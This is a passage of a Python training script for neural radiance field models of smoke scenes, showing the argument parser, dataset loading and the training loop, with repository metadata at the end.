 if N_importance > 0:\n        ret['rgb0'] = rgb_map_0\n        ret['disp0'] = disp_map_0\n        ret['acc0'] = acc_map_0\n        ret['z_std'] = torch.std(z_samples, dim=-1, unbiased=False) # [N_rays]\n    \n    if raw[-1] is not None:\n        ret['rgbh1'] = rgbh1_map\n        ret['acch1'] = acch1_map\n        ret['rgbh2'] = rgbh2_map\n        ret['acch2'] = acch2_map\n        if N_importance > 0:\n            ret['rgbh10'] = rgbh10_map\n            ret['acch10'] = acch10_map\n            ret['rgbh20'] = rgbh20_map\n            ret['acch20'] = acch20_map\n        ret['rgbM'] = rgbh1_map * 0.5 + rgbh2_map * 0.5\n\n    for k in ret:\n        if (torch.isnan(ret[k]).any() or torch.isinf(ret[k]).any()) and DEBUG:\n            print(f\"! 
[Numerical Error] {k} contains nan or inf.\")\n\n    return ret\n\n\ndef config_parser():\n\n    import configargparse\n    parser = configargparse.ArgumentParser()\n    parser.add_argument('--config', is_config_file=True, \n                        help='config file path')\n    parser.add_argument(\"--expname\", type=str, \n                        help='experiment name')\n    parser.add_argument(\"--basedir\", type=str, default='./logs/', \n                        help='where to store ckpts and logs')\n    parser.add_argument(\"--datadir\", type=str, default='./data/llff/fern', \n                        help='input data directory')\n\n    # training options\n    parser.add_argument(\"--net_model\", type=str, default='nerf',\n                        help='which model to use: nerf, siren, or hybrid')\n    parser.add_argument(\"--netdepth\", type=int, default=8, \n                        help='layers in network')\n    parser.add_argument(\"--netwidth\", type=int, default=256, \n                        help='channels per layer')\n    parser.add_argument(\"--netdepth_fine\", type=int, default=8, \n                        help='layers in fine network')\n    parser.add_argument(\"--netwidth_fine\", type=int, default=256, \n                        help='channels per layer in fine network')\n    parser.add_argument(\"--N_rand\", type=int, default=32*32*4, \n                        help='batch size (number of random rays per gradient step)')\n    parser.add_argument(\"--lrate\", type=float, default=5e-4, \n                        help='learning rate')\n    parser.add_argument(\"--lrate_decay\", type=int, default=250, \n                        help='exponential learning rate decay (in 1000 steps)')\n    parser.add_argument(\"--chunk\", type=int, default=1024*32, \n                        help='number of rays processed in parallel, decrease if running out of memory')\n    parser.add_argument(\"--netchunk\", type=int, default=1024*64, \n                        help='number of pts sent through network in parallel, decrease if running out of memory')\n    parser.add_argument(\"--no_batching\", action='store_true', \n                        help='only take random rays from 1 image at a time')\n    parser.add_argument(\"--no_reload\", action='store_true', \n                        help='do not reload weights from saved ckpt')\n    parser.add_argument(\"--ft_path\", type=str, default=None, \n                        help='specific weights npy file to reload for coarse network')\n    parser.add_argument(\"--fix_seed\", type=int, default=42,\n                        help='the random seed.')\n    parser.add_argument(\"--fading_layers\", type=int, default=-1,\n                        help='for siren and hybrid models, the step to finish fading model layers one by one during training.')\n    parser.add_argument(\"--tempo_delay\", type=int, default=0,\n                        help='for hybrid models, the step to start learning the temporal dynamic component.')\n    parser.add_argument(\"--vel_delay\", type=int, default=10000,\n                        help='for siren and hybrid models, the step to start learning the velocity.')\n    parser.add_argument(\"--N_iter\", type=int, default=200000,\n                        help='total number of training iterations.') \n    parser.add_argument(\"--train_warp\", default=False, action='store_true',\n                        help='train radiance model with velocity warping')\n\n    # model options\n    parser.add_argument(\"--bbox_min\", type=str,\n                        default='', help='use a boundingbox, the minXYZ')\n    parser.add_argument(\"--bbox_max\", type=str,\n                        default='1.0,1.0,1.0', help='use a boundingbox, the maxXYZ')\n\n    # loss hyper params, negative values mean to disable the loss terms\n    parser.add_argument(\"--vgg_strides\", type=int, default=4,\n                        help='vgg stride, should be >= 2')\n    parser.add_argument(\"--ghostW\", type=float,\n                        default=-0.0, help='weight for the ghost density regularization')\n    parser.add_argument(\"--vggW\", type=float,\n                        default=-0.0, help='weight for the VGG loss')\n    parser.add_argument(\"--overlayW\", type=float,\n                        default=-0.0, 
help='weight for the overlay regularization')\n parser.add_argument(\"--d2vW\", type=float,\n default=-0.0, help='weight for the d2v loss')\n parser.add_argument(\"--nseW\", type=float,\n default=0.001, help='velocity model, training weight for the physical equations')\n \n # task params\n parser.add_argument(\"--vol_output_only\", action='store_true', \n help='do not optimize, reload weights and output volumetric density and velocity')\n parser.add_argument(\"--vol_output_W\", type=int, default=256, \n help='In output mode: the output resolution along x; In training mode: the sampling resolution for training')\n parser.add_argument(\"--render_only\", action='store_true', \n help='do not optimize, reload weights and render out render_poses path')\n parser.add_argument(\"--render_test\", action='store_true', \n help='render the test set instead of render_poses path')\n\n # rendering options\n parser.add_argument(\"--N_samples\", type=int, default=64, \n help='number of coarse samples per ray')\n parser.add_argument(\"--N_importance\", type=int, default=0,\n help='number of additional fine samples per ray')\n parser.add_argument(\"--perturb\", type=float, default=1.,\n help='set to 0. for no jitter, 1. for jitter')\n parser.add_argument(\"--use_viewdirs\", action='store_true', \n help='use full 5D input instead of 3D')\n parser.add_argument(\"--i_embed\", type=int, default=0, \n help='set 0 for default positional encoding, -1 for none')\n parser.add_argument(\"--multires\", type=int, default=10, \n help='log2 of max freq for positional encoding (3D location)')\n parser.add_argument(\"--multires_views\", type=int, default=4, \n help='log2 of max freq for positional encoding (2D direction)')\n parser.add_argument(\"--raw_noise_std\", type=float, default=0., \n help='std dev of noise added to regularize sigma_a output, 1e0 recommended')\n parser.add_argument(\"--render_factor\", type=int, default=0, \n help='downsampling factor to speed up rendering, set 4 or 8 for fast preview')\n\n # training options\n parser.add_argument(\"--precrop_iters\", type=int, default=0,\n help='number of steps to train on central crops')\n parser.add_argument(\"--precrop_frac\", type=float,\n default=.5, help='fraction of img taken for central crops') \n\n # dataset options\n parser.add_argument(\"--dataset_type\", type=str, default='llff', \n help='options: llff / blender / deepvoxels')\n parser.add_argument(\"--testskip\", type=int, default=8, \n help='will load 1/N images from test/val sets, useful for large datasets like deepvoxels')\n\n ## deepvoxels flags\n parser.add_argument(\"--shape\", type=str, default='greek', \n help='options : armchair / cube / greek / vase')\n\n ## blender flags\n parser.add_argument(\"--white_bkgd\", action='store_true', \n help='set to render synthetic data on a given bkgd (always use for dvoxels)')\n parser.add_argument(\"--half_res\", type=str, default='normal', \n help='load blender synthetic data at 400x400 instead of 800x800')\n\n ## llff flags\n parser.add_argument(\"--factor\", type=int, default=8, \n help='downsample factor for LLFF images')\n parser.add_argument(\"--no_ndc\", action='store_true', \n help='do not use normalized device coordinates (set for non-forward facing scenes)')\n parser.add_argument(\"--lindisp\", action='store_true', \n help='sampling linearly in disparity rather than depth')\n parser.add_argument(\"--spherify\", action='store_true', \n help='set for spherical 360 scenes')\n parser.add_argument(\"--llffhold\", type=int, default=8, \n help='will take 
every 1/N images as LLFF test set, paper uses 8')\n\n    # logging/saving options\n    parser.add_argument(\"--i_print\", type=int, default=400, \n                        help='frequency of console printout and metric logging')\n    parser.add_argument(\"--i_img\", type=int, default=2000, \n                        help='frequency of tensorboard image logging')\n    parser.add_argument(\"--i_weights\", type=int, default=25000, \n                        help='frequency of weight ckpt saving')\n    parser.add_argument(\"--i_testset\", type=int, default=50000, \n                        help='frequency of testset saving')\n    parser.add_argument(\"--i_video\", type=int, default=50000, \n                        help='frequency of render_poses video saving')\n    \n    return parser\n\n\ndef train(parser, args):\n\n    # Load data\n    K = None\n    if args.dataset_type == 'llff':\n        images, poses, bds, render_poses, i_test = load_llff_data(args.datadir, args.factor,\n                                                                  recenter=True, bd_factor=.75,\n                                                                  spherify=args.spherify)\n        hwf = poses[0,:3,-1]\n        poses = poses[:,:3,:4]\n        print('Loaded llff', images.shape, render_poses.shape, hwf, args.datadir)\n        if not isinstance(i_test, list):\n            i_test = [i_test]\n\n        if args.llffhold > 0:\n            print('Auto LLFF holdout,', args.llffhold)\n            i_test = np.arange(images.shape[0])[::args.llffhold]\n\n        i_val = i_test\n        i_train = np.array([i for i in np.arange(int(images.shape[0])) if\n                        (i not in i_test and i not in i_val)])\n\n        print('DEFINING BOUNDS')\n        if args.no_ndc:\n            near = np.ndarray.min(bds) * .9\n            far = np.ndarray.max(bds) * 1.\n            \n        else:\n            near = 0.\n            far = 1.\n        print('NEAR FAR', near, far)\n\n    elif args.dataset_type == 'blender':\n        images, poses, render_poses, hwf, i_split = load_blender_data(args.datadir, args.half_res in [\"True\", \"half\"], args.testskip)\n        print('Loaded blender', images.shape, render_poses.shape, hwf, args.datadir)\n        i_train, i_val, i_test = i_split\n\n        near = 2.\n        far = 6.\n\n        if args.white_bkgd is not None:\n            images = images[...,:3]*images[...,-1:] + (1.-images[...,-1:])*args.white_bkgd\n        else:\n            images = images[...,:3]\n\n    elif args.dataset_type == 'LINEMOD':\n        images, poses, render_poses, hwf, K, i_split, near, far = load_LINEMOD_data(args.datadir, args.half_res in [\"True\", \"half\"], args.testskip)\n        print(f'Loaded LINEMOD, images shape: {images.shape}, hwf: {hwf}, K: {K}')\n        print(f'[CHECK HERE] near: {near}, far: {far}.')\n        i_train, i_val, i_test = i_split\n\n        if args.white_bkgd is not None:\n            images = images[...,:3]*images[...,-1:] + (1.-images[...,-1:])*args.white_bkgd\n        else:\n            images = images[...,:3]\n\n    elif args.dataset_type == 'deepvoxels':\n\n        images, poses, render_poses, hwf, i_split = load_dv_data(scene=args.shape,\n                                                                 basedir=args.datadir,\n                                                                 testskip=args.testskip)\n\n        print('Loaded deepvoxels', images.shape, render_poses.shape, hwf, args.datadir)\n        i_train, i_val, i_test = i_split\n\n        hemi_R = np.mean(np.linalg.norm(poses[:,:3,-1], axis=-1))\n        near = hemi_R-1.\n        far = hemi_R+1.\n\n    else:\n        print('Unknown dataset type', args.dataset_type, 'exiting')\n        return\n\n    # Cast intrinsics to right types\n    H, W, focal = hwf\n    H, W = int(H), int(W)\n    hwf = [H, W, focal]\n\n    if K is None:\n        K = np.array([\n            [focal, 0, 0.5*W],\n            [0, focal, 0.5*H],\n            [0, 0, 1]\n        ])\n\n    if args.render_test:\n        render_poses = np.array(poses[i_test])\n\n    # Create log dir and copy the config file\n    basedir = args.basedir\n    expname = args.expname\n    os.makedirs(os.path.join(basedir, expname), exist_ok=True)\n    f = os.path.join(basedir, expname, 'args.txt')\n    with open(f, 'w') as file:\n        for arg in sorted(vars(args)):\n            attr = getattr(args, arg)\n            file.write('{} = {}\\n'.format(arg, attr))\n    if args.config 
is not None:\n        f = os.path.join(basedir, expname, 'config.txt')\n        with open(f, 'w') as file, open(args.config, 'r') as cfg_file:\n            file.write(cfg_file.read())\n\n    # Create nerf model\n    render_kwargs_train, render_kwargs_test, start, grad_vars, optimizer, vel_optimizer = create_nerf(args)\n    global_step = start\n\n    bds_dict = {\n        'near' : near,\n        'far' : far,\n    }\n    render_kwargs_train.update(bds_dict)\n    render_kwargs_test.update(bds_dict)\n\n    # Move testing data to GPU\n    render_poses = torch.Tensor(render_poses).to(device)\n\n    # Short circuit if only rendering out from trained model\n    if args.render_only:\n        print('RENDER ONLY')\n        with torch.no_grad():\n            if args.render_test:\n                # render_test switches to test poses\n                images = images[i_test]\n            else:\n                # Default is smoother render_poses path\n                images = None\n\n            testsavedir = os.path.join(basedir, expname, 'renderonly_{}_{:06d}'.format('test' if args.render_test else 'path', start))\n            os.makedirs(testsavedir, exist_ok=True)\n            print('test poses shape', render_poses.shape)\n\n            rgbs, _ = render_path(render_poses, hwf, K, args.chunk, render_kwargs_test, gt_imgs=images, savedir=testsavedir, render_factor=args.render_factor, bkgd_color=args.white_bkgd)\n            print('Done rendering', testsavedir)\n            imageio.mimwrite(os.path.join(testsavedir, 'video.mp4'), to8b(rgbs), fps=30, quality=8)\n\n            return\n\n    # Prepare raybatch tensor if batching random rays\n    N_rand = args.N_rand\n    use_batching = not args.no_batching\n    if use_batching:\n        # For random ray batching\n        print('get rays')\n        rays = np.stack([get_rays_np(H, W, K, p) for p in poses[:,:3,:4]], 0) # [N, ro+rd, H, W, 3]\n        print('done, concats')\n        rays_rgb = np.concatenate([rays, images[:,None]], 1) # [N, ro+rd+rgb, H, W, 3]\n        rays_rgb = np.transpose(rays_rgb, [0,2,3,1,4]) # [N, H, W, ro+rd+rgb, 3]\n        rays_rgb = np.stack([rays_rgb[i] for i in i_train], 0) # train images only\n        rays_rgb = np.reshape(rays_rgb, [-1,3,3]) # [(N-1)*H*W, ro+rd+rgb, 3]\n        rays_rgb = rays_rgb.astype(np.float32)\n        print('shuffle rays')\n        np.random.shuffle(rays_rgb)\n\n        print('done')\n        i_batch = 0\n\n    # Move training data to GPU\n    if use_batching:\n        images = torch.Tensor(images).to(device)\n        poses = torch.Tensor(poses).to(device)\n        rays_rgb = torch.Tensor(rays_rgb).to(device)\n\n\n    N_iters = args.N_iter + 1\n    print('Begin')\n    print('TRAIN views are', i_train)\n    print('TEST views are', i_test)\n    print('VAL views are', i_val)\n\n    # Summary writers\n    # writer = SummaryWriter(os.path.join(basedir, 'summaries', expname))\n    \n    start = start + 1\n    for i in trange(start, N_iters):\n        time0 = time.time()\n\n        # Sample random ray batch\n        if use_batching:\n            # Random over all images\n            batch = rays_rgb[i_batch:i_batch+N_rand] # [B, 2+1, 3*?]\n            batch = torch.transpose(batch, 0, 1)\n            batch_rays, target_s = batch[:2], batch[2]\n\n            i_batch += N_rand\n            if i_batch >= rays_rgb.shape[0]:\n                print(\"Shuffle data after an epoch!\")\n                rand_idx = torch.randperm(rays_rgb.shape[0])\n                rays_rgb = rays_rgb[rand_idx]\n                i_batch = 0\n\n        else:\n            # Random from one image\n            img_i = np.random.choice(i_train)\n            target = images[img_i]\n            target = torch.Tensor(target).to(device)\n            pose = poses[img_i, :3,:4]\n\n            if N_rand is not None:\n                rays_o, rays_d = get_rays(H, W, K, torch.Tensor(pose)) # (H, W, 3), (H, W, 3)\n\n                if i < args.precrop_iters:\n                    dH = int(H//2 * args.precrop_frac)\n                    dW = int(W//2 * args.precrop_frac)\n                    coords = torch.stack(\n                        torch.meshgrid(\n                            torch.linspace(H//2 - dH, H//2 + dH - 1, 2*dH), \n                            torch.linspace(W//2 - dW, W//2 + dW - 1, 2*dW)\n                        ), -1)\n                    if i == start:\n                        
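# log the center-crop window once, on the first training iteration only\n                        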
print(f\"[Config] Center cropping of size {2*dH} x {2*dW} is enabled until iter {args.precrop_iters}\")                \n                else:\n                    coords = torch.stack(torch.meshgrid(torch.linspace(0, H-1, H), torch.linspace(0, W-1, W)), -1) # (H, W, 2)\n\n                coords = torch.reshape(coords, [-1,2]) # (H * W, 2)\n                select_inds = np.random.choice(coords.shape[0], size=[N_rand], replace=False) # (N_rand,)\n                select_coords = coords[select_inds].long() # (N_rand, 2)\n                rays_o = rays_o[select_coords[:, 0], select_coords[:, 1]] # (N_rand, 3)\n                rays_d = rays_d[select_coords[:, 0], select_coords[:, 1]] # (N_rand, 3)\n                batch_rays = torch.stack([rays_o, rays_d], 0)\n                target_s = target[select_coords[:, 0], select_coords[:, 1]] # (N_rand, 3)\n\n        ##### Core optimization loop #####\n        rgb, disp, acc, extras = render(H, W, K, chunk=args.chunk, rays=batch_rays,\n                                                verbose=i < 10, retraw=False,\n                                                bkgd_color=args.white_bkgd,\n                                                **render_kwargs_train)\n\n        optimizer.zero_grad()\n        img_loss = img2mse(rgb, target_s)\n        # trans = extras['raw'][...,-1]\n        loss = img_loss\n        psnr = mse2psnr(img_loss)\n\n        if 'rgb0' in extras:\n            img_loss0 = img2mse(extras['rgb0'], target_s)\n            loss = loss + img_loss0\n            psnr0 = mse2psnr(img_loss0)\n\n        loss.backward()\n        optimizer.step()\n\n        # NOTE: IMPORTANT!\n        ###   update learning rate   ###\n        decay_rate = 0.1\n        decay_steps = args.lrate_decay * 1000\n        new_lrate = args.lrate * (decay_rate ** (global_step / decay_steps))\n        for param_group in optimizer.param_groups:\n            param_group['lr'] = new_lrate\n        ################################\n\n        dt = time.time()-time0\n        # print(f\"Step: {global_step}, Loss: {loss}, Time: {dt}\")\n        #####           end            #####\n\n        # Rest is logging\n        if i%args.i_weights==0:\n            path = os.path.join(basedir, expname, '{:06d}.tar'.format(i))\n            save_dict = {\n                'global_step': global_step,\n                'network_fn_state_dict': render_kwargs_train['network_fn'].state_dict(),\n                'optimizer_state_dict': optimizer.state_dict(),\n            }\n            # guard: the fine network is None when N_importance == 0\n            if render_kwargs_train['network_fine'] is not None:\n                save_dict['network_fine_state_dict'] = render_kwargs_train['network_fine'].state_dict()\n            torch.save(save_dict, path)\n            print('Saved checkpoints at', path)\n\n        if i%args.i_video==0 and i > 0:\n            # Turn on testing mode\n            with torch.no_grad():\n                rgbs, disps = render_path(render_poses, hwf, K, args.chunk, render_kwargs_test, bkgd_color=args.white_bkgd)\n            print('Done, saving', rgbs.shape, disps.shape)\n            moviebase = os.path.join(basedir, expname, '{}_spiral_{:06d}_'.format(expname, i))\n            imageio.mimwrite(moviebase + 'rgb.mp4', to8b(rgbs), fps=30, quality=8)\n            imageio.mimwrite(moviebase + 'disp.mp4', to8b(disps / np.max(disps)), fps=30, quality=8)\n\n            # if args.use_viewdirs:\n            #     render_kwargs_test['c2w_staticcam'] = render_poses[0][:3,:4]\n            #     with torch.no_grad():\n            #         rgbs_still, _ = render_path(render_poses, hwf, args.chunk, render_kwargs_test)\n            #     render_kwargs_test['c2w_staticcam'] = None\n            #     imageio.mimwrite(moviebase + 'rgb_still.mp4', to8b(rgbs_still), fps=30, quality=8)\n\n        if i%args.i_testset==0 and i > 0:\n            testsavedir = os.path.join(basedir, expname, 'testset_{:06d}'.format(i))\n            os.makedirs(testsavedir, exist_ok=True)\n            print('test poses shape', poses[i_test].shape)\n            with torch.no_grad():\n                render_path(torch.Tensor(poses[i_test]).to(device), hwf, K, args.chunk, render_kwargs_test, gt_imgs=images[i_test], savedir=testsavedir, bkgd_color=args.white_bkgd)\n            print('Saved test set')\n\n\n        \n        if i%args.i_print==0:\n            print(f\"[TRAIN] Iter: {i} Loss: {loss.item()} PSNR: {psnr.item()}\")\n            sys.stdout.flush()\n\n        \"\"\"\n            print(expname, i, psnr.numpy(), loss.numpy(), global_step.numpy())\n            print('iter time {:.05f}'.format(dt))\n\n            with 
tf.contrib.summary.record_summaries_every_n_global_steps(args.i_print):\n tf.contrib.summary.scalar('loss', loss)\n tf.contrib.summary.scalar('psnr', psnr)\n tf.contrib.summary.histogram('tran', trans)\n if args.N_importance > 0:\n tf.contrib.summary.scalar('psnr0', psnr0)\n\n\n if i%args.i_img==0:\n\n # Log a rendered validation view to Tensorboard\n img_i=np.random.choice(i_val)\n target = images[img_i]\n pose = poses[img_i, :3,:4]\n with torch.no_grad():\n rgb, disp, acc, extras = render(H, W, focal, chunk=args.chunk, c2w=pose,\n **render_kwargs_test)\n\n psnr = mse2psnr(img2mse(rgb, target))\n\n with tf.contrib.summary.record_summaries_every_n_global_steps(args.i_img):\n\n tf.contrib.summary.image('rgb', to8b(rgb)[tf.newaxis])\n tf.contrib.summary.image('disp', disp[tf.newaxis,...,tf.newaxis])\n tf.contrib.summary.image('acc', acc[tf.newaxis,...,tf.newaxis])\n\n tf.contrib.summary.scalar('psnr_holdout', psnr)\n tf.contrib.summary.image('rgb_holdout', target[tf.newaxis])\n\n\n if args.N_importance > 0:\n\n with tf.contrib.summary.record_summaries_every_n_global_steps(args.i_img):\n tf.contrib.summary.image('rgb0', to8b(extras['rgb0'])[tf.newaxis])\n tf.contrib.summary.image('disp0', extras['disp0'][tf.newaxis,...,tf.newaxis])\n tf.contrib.summary.image('z_std', extras['z_std'][tf.newaxis,...,tf.newaxis])\n \"\"\"\n\n global_step += 1\n\n\nif __name__=='__main__':\n torch.set_default_tensor_type('torch.cuda.FloatTensor')\n\n parser = config_parser()\n args = parser.parse_args()\n set_rand_seed(args.fix_seed)\n\n bkg_flag = args.white_bkgd\n args.white_bkgd = np.ones([3], dtype=np.float32) if bkg_flag else None\n\n if args.dataset_type != 'pinf_data':\n train(parser, args)\n else:\n print(\"Try 'python run_pinf.py' with the config file instead.\")\n", "repo_name": "RachelCmy/pinf_smoke", "sub_path": "run_nerf.py", "file_name": "run_nerf.py", "file_ext": "py", "file_size_in_byte": 50436, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 31, "dataset": "github-code", "pt": "31", "api": [{"api_name": "sys.stderr", "line_number": 11, "usage_type": "attribute"}, {"api_name": "sys.stderr.isatty", "line_number": 11, "usage_type": "call"}, {"api_name": "tqdm.trange", "line_number": 15, "usage_type": "name"}, {"api_name": "torch.device", "line_number": 27, "usage_type": "call"}, {"api_name": "torch.cuda.is_available", "line_number": 27, "usage_type": "call"}, {"api_name": "torch.cuda", "line_number": 27, "usage_type": "attribute"}, {"api_name": "numpy.random.seed", "line_number": 28, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 28, "usage_type": "attribute"}, {"api_name": "numpy.random.seed", "line_number": 32, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 32, "usage_type": "attribute"}, {"api_name": "torch.manual_seed", "line_number": 33, "usage_type": "call"}, {"api_name": "torch.cuda.is_available", "line_number": 34, "usage_type": "call"}, {"api_name": "torch.cuda", "line_number": 34, "usage_type": "attribute"}, {"api_name": "torch.cuda.manual_seed", "line_number": 35, "usage_type": "call"}, {"api_name": "torch.cuda", "line_number": 35, "usage_type": "attribute"}, {"api_name": "torch.backends", "line_number": 36, "usage_type": "attribute"}, {"api_name": "torch.cat", "line_number": 45, "usage_type": "call"}, {"api_name": "torch.reshape", "line_number": 52, "usage_type": "call"}, {"api_name": "torch.reshape", "line_number": 57, "usage_type": "call"}, {"api_name": "torch.cat", "line_number": 59, "usage_type": "call"}, {"api_name": 
"torch.reshape", "line_number": 62, "usage_type": "call"}, {"api_name": "torch.cat", "line_number": 77, "usage_type": "call"}, {"api_name": "torch.norm", "line_number": 121, "usage_type": "call"}, {"api_name": "torch.reshape", "line_number": 122, "usage_type": "call"}, {"api_name": "torch.reshape", "line_number": 130, "usage_type": "call"}, {"api_name": "torch.reshape", "line_number": 131, "usage_type": "call"}, {"api_name": "torch.ones_like", "line_number": 133, "usage_type": "call"}, {"api_name": "torch.cat", "line_number": 134, "usage_type": "call"}, {"api_name": "torch.cat", "line_number": 136, "usage_type": "call"}, {"api_name": "torch.cat", "line_number": 141, "usage_type": "call"}, {"api_name": "torch.reshape", "line_number": 146, "usage_type": "call"}, {"api_name": "torch.Tensor", "line_number": 149, "usage_type": "call"}, {"api_name": "time.time", "line_number": 175, "usage_type": "call"}, {"api_name": "tqdm.tqdm", "line_number": 177, "usage_type": "call"}, {"api_name": "time.time", "line_number": 178, "usage_type": "call"}, {"api_name": "time.time", "line_number": 181, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 196, "usage_type": "call"}, {"api_name": "os.path", "line_number": 196, "usage_type": "attribute"}, {"api_name": "imageio.imwrite", "line_number": 197, "usage_type": "call"}, {"api_name": "numpy.concatenate", "line_number": 207, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 209, "usage_type": "call"}, {"api_name": "os.path", "line_number": 209, "usage_type": "attribute"}, {"api_name": "imageio.imwrite", "line_number": 210, "usage_type": "call"}, {"api_name": "numpy.stack", "line_number": 212, "usage_type": "call"}, {"api_name": "numpy.stack", "line_number": 213, "usage_type": "call"}, {"api_name": "torch.optim.Adam", "line_number": 272, "usage_type": "call"}, {"api_name": "torch.optim", "line_number": 272, "usage_type": "attribute"}, {"api_name": "torch.optim.Adam", "line_number": 276, "usage_type": "call"}, {"api_name": "torch.optim", "line_number": 276, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 287, "usage_type": "call"}, {"api_name": "os.path", "line_number": 287, "usage_type": "attribute"}, {"api_name": "os.listdir", "line_number": 287, "usage_type": "call"}, {"api_name": "torch.load", "line_number": 293, "usage_type": "call"}, {"api_name": "torch.nn.functional.relu", "line_number": 356, "usage_type": "attribute"}, {"api_name": "torch.nn.functional", "line_number": 356, "usage_type": "name"}, {"api_name": "torch.exp", "line_number": 356, "usage_type": "call"}, {"api_name": "torch.cat", "line_number": 359, "usage_type": "call"}, {"api_name": "torch.Tensor", "line_number": 359, "usage_type": "call"}, {"api_name": "torch.norm", "line_number": 361, "usage_type": "call"}, {"api_name": "torch.randn", "line_number": 369, "usage_type": "call"}, {"api_name": "numpy.random.seed", "line_number": 373, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 373, "usage_type": "attribute"}, {"api_name": "numpy.random.rand", "line_number": 374, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 374, "usage_type": "attribute"}, {"api_name": "torch.Tensor", "line_number": 375, "usage_type": "call"}, {"api_name": "torch.where", "line_number": 379, "usage_type": "call"}, {"api_name": "torch.zeros_like", "line_number": 379, "usage_type": "call"}, {"api_name": "torch.sigmoid", "line_number": 380, "usage_type": "call"}, {"api_name": "torch.stack", "line_number": 385, "usage_type": "call"}, 
{"api_name": "torch.prod", "line_number": 387, "usage_type": "call"}, {"api_name": "torch.cat", "line_number": 389, "usage_type": "call"}, {"api_name": "torch.cumprod", "line_number": 391, "usage_type": "call"}, {"api_name": "torch.sum", "line_number": 401, "usage_type": "call"}, {"api_name": "torch.sum", "line_number": 407, "usage_type": "call"}, {"api_name": "torch.stack", "line_number": 411, "usage_type": "call"}, {"api_name": "torch.sum", "line_number": 413, "usage_type": "call"}, {"api_name": "torch.max", "line_number": 427, "usage_type": "call"}, {"api_name": "torch.ones_like", "line_number": 427, "usage_type": "call"}, {"api_name": "torch.reshape", "line_number": 497, "usage_type": "call"}, {"api_name": "torch.linspace", "line_number": 500, "usage_type": "call"}, {"api_name": "torch.cat", "line_number": 511, "usage_type": "call"}, {"api_name": "torch.cat", "line_number": 512, "usage_type": "call"}, {"api_name": "torch.rand", "line_number": 514, "usage_type": "call"}, {"api_name": "numpy.random.seed", "line_number": 518, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 518, "usage_type": "attribute"}, {"api_name": "numpy.random.rand", "line_number": 519, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 519, "usage_type": "attribute"}, {"api_name": "torch.Tensor", "line_number": 520, "usage_type": "call"}, {"api_name": "torch.reshape", "line_number": 526, "usage_type": "call"}, {"api_name": "torch.cat", "line_number": 527, "usage_type": "call"}, {"api_name": "torch.split", "line_number": 535, "usage_type": "call"}, {"api_name": "torch.reshape", "line_number": 538, "usage_type": "call"}, {"api_name": "torch.rand", "line_number": 543, "usage_type": "call"}, {"api_name": "torch.Tensor", "line_number": 548, "usage_type": "call"}, {"api_name": "torch.cat", "line_number": 552, "usage_type": "call"}, {"api_name": "torch.sort", "line_number": 599, "usage_type": "call"}, {"api_name": "torch.cat", "line_number": 599, "usage_type": "call"}, {"api_name": "torch.reshape", "line_number": 603, "usage_type": "call"}, {"api_name": "torch.cat", "line_number": 604, "usage_type": "call"}, {"api_name": "torch.std", "line_number": 635, "usage_type": "call"}, {"api_name": "torch.isnan", "line_number": 650, "usage_type": "call"}, {"api_name": "torch.isinf", "line_number": 650, "usage_type": "call"}, {"api_name": "configargparse.ArgumentParser", "line_number": 659, "usage_type": "call"}, {"api_name": "nerf_load.load_llff.load_llff_data", "line_number": 813, "usage_type": "call"}, {"api_name": "numpy.arange", "line_number": 824, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 827, "usage_type": "call"}, {"api_name": "numpy.arange", "line_number": 827, "usage_type": "call"}, {"api_name": "numpy.ndarray.min", "line_number": 832, "usage_type": "call"}, {"api_name": "numpy.ndarray", "line_number": 832, "usage_type": "attribute"}, {"api_name": "numpy.ndarray.max", "line_number": 833, "usage_type": "call"}, {"api_name": "numpy.ndarray", "line_number": 833, "usage_type": "attribute"}, {"api_name": "nerf_load.load_blender.load_blender_data", "line_number": 841, "usage_type": "call"}, {"api_name": "nerf_load.load_LINEMOD.load_LINEMOD_data", "line_number": 854, "usage_type": "call"}, {"api_name": "nerf_load.load_deepvoxels.load_dv_data", "line_number": 866, "usage_type": "call"}, {"api_name": "numpy.mean", "line_number": 873, "usage_type": "call"}, {"api_name": "numpy.linalg.norm", "line_number": 873, "usage_type": "call"}, {"api_name": "numpy.linalg", "line_number": 
873, "usage_type": "attribute"}, {"api_name": "numpy.array", "line_number": 887, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 894, "usage_type": "call"}, {"api_name": "os.makedirs", "line_number": 899, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 899, "usage_type": "call"}, {"api_name": "os.path", "line_number": 899, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 900, "usage_type": "call"}, {"api_name": "os.path", "line_number": 900, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 906, "usage_type": "call"}, {"api_name": "os.path", "line_number": 906, "usage_type": "attribute"}, {"api_name": "torch.Tensor", "line_number": 922, "usage_type": "call"}, {"api_name": "torch.no_grad", "line_number": 927, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 935, "usage_type": "call"}, {"api_name": "os.path", "line_number": 935, "usage_type": "attribute"}, {"api_name": "os.makedirs", "line_number": 936, "usage_type": "call"}, {"api_name": "imageio.mimwrite", "line_number": 941, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 941, "usage_type": "call"}, {"api_name": "os.path", "line_number": 941, "usage_type": "attribute"}, {"api_name": "numpy.stack", "line_number": 951, "usage_type": "call"}, {"api_name": "numpy.concatenate", "line_number": 953, "usage_type": "call"}, {"api_name": "numpy.transpose", "line_number": 954, "usage_type": "call"}, {"api_name": "numpy.stack", "line_number": 955, "usage_type": "call"}, {"api_name": "numpy.reshape", "line_number": 956, "usage_type": "call"}, {"api_name": "numpy.float32", "line_number": 957, "usage_type": "attribute"}, {"api_name": "numpy.random.shuffle", "line_number": 959, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 959, "usage_type": "attribute"}, {"api_name": "torch.Tensor", "line_number": 966, "usage_type": "call"}, {"api_name": "torch.Tensor", "line_number": 967, "usage_type": "call"}, {"api_name": "torch.Tensor", "line_number": 969, "usage_type": "call"}, {"api_name": 